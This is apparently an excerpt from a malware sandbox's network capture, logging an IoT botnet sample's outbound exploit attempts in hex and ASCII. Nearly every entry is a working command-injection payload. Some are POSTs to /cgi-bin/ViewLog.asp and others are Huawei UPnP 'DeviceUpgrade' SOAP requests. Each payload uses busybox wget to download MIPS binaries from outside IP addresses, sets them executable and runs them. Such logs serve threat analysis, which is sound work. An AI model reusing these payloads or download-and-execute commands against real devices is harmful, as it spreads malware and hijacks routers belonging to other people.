                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:13.505038977 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:13.608288050 CET1314INHTTP/1.1 400 Bad Request
                                              Server: squid/3.5.27
                                              Mime-Version: 1.0
                                              Date: Thu, 23 Nov 2023 04:18:13 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 3556
                                              X-Squid-Error: ERR_INVALID_URL 0
                                              Vary: Accept-Language
                                              Content-Language: en
                                              X-Cache: MISS from ubuntu
                                              X-Cache-Lookup: NONE from ubuntu:8080
                                              Via: 1.1 ubuntu (squid/3.5.27)
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2017 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-seri


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              703192.168.2.145149694.120.223.1298080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:13.409543991 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              704192.168.2.145365094.122.20.1718080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:13.629512072 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              705192.168.2.1441782156.241.92.9537215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:13.638202906 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:17.728903055 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:23.872878075 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              706192.168.2.145112895.213.217.1688080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:13.823838949 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              707192.168.2.144407431.24.137.358080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:13.824271917 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:14.021670103 CET466INHTTP/1.1 404 Not Found
                                              Date: Thu, 23 Nov 2023 05:18:16 GMT
                                              Server: Webs
                                              X-Frame-Options: SAMEORIGIN
                                              Cache-Control: no-cache
                                              Content-Length: 166
                                              Content-Type: text/html
                                              Connection: keep-alive
                                              Keep-Alive: timeout=180, max=99
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              708192.168.2.144252285.158.99.998080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:13.843660116 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:14.977093935 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:16.320935011 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:19.009063959 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              709192.168.2.143946294.120.30.1928080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:13.857424974 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              710192.168.2.145097294.101.201.798080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:13.871733904 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
